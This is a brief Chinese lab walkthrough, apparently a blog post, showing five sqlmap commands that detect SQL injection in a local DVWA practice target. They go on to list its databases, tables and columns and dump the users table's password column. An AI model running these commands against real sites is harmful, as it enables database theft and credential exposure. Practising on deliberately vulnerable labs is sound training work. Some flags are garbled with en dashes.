1、通过sqlmap进行注入***:

root@bt:/pentest/database/sqlmap# python sqlmap.py  -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826;PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'


2、通过sqlmap获取数据库名:

root@bt:/pentest/database/sqlmap# python sqlmap.py  -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826; PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'--dbs -v 0


3、通过sqlmap获取表名;

root@bt:/pentest/database/sqlmap# python sqlmap.py  -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826; PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'-D dvwa –tables

BT5利用sqlmap对漏洞靶机扫描_第1张图片


4、通过sqlmap获取列名:

root@bt:/pentest/database/sqlmap# python sqlmap.py  -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826;PHPSESSID=7ka4shiqc8t58bgp2ds82p0140' -D dvwa --tables -T users –columns

BT5利用sqlmap对漏洞靶机扫描_第2张图片



5、通过sqlmap导出password列的内容:

root@bt:/pentest/database/sqlmap# python sqlmap.py  -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826; PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'-D dvwa --tables -T users --columns –dump

BT5利用sqlmap对漏洞靶机扫描_第3张图片